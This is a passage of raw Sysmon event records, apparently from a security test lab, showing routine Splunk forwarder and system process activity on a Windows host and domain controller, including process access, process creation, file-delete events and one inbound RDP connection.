10341000x8000000000000000805944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.166{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:26.151{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:26.151{0C1E0330-F29E-60EB-3779-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:27.992{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=150FB7050802D0A16C59CA061A538063,SHA256=CC7D00FA3BBF31E36A03602B280817017367C875AB3BC2E4BF2841B3A91F786F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8881C08752F4786A7B5536D70F47F4AF,SHA256=0A5D2B394D24352D2F81E1576F69584C71DD761C998FD36588A4072B253DBD07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=149572522252F789C8A05686B78EAEF8,SHA256=09D532E82DCD3AC50CA3FC30AF4B6FB2D640C4B1DBC60EAA8B32DC8B7417899C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.666{0C1E0330-F29F-60EB-3979-00000000D001}37723708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001045756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:19.660{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT 
AUTHORITY\NETWORK SERVICEtcpfalsefalse194.156.88.187chabka-hosting.com62841-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001045755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:27.011{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A8C83559D34EDEE4F290BF4559D0B23,SHA256=52C207B6150F385A99C76A68862C2D412C73961F596CAC52F8A7F6F6DA6DC989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:27.011{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6576C650EC8B80BCE4E848626A770FA,SHA256=CC4CF15AD9D9D60D9E13F7B16827893414849D1AB9DC89AFF3B6E2378D8A898B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805969Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805968Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805967Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:43:27.510{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:27.495{0C1E0330-F29F-60EB-3979-00000000D001}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:28.682{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
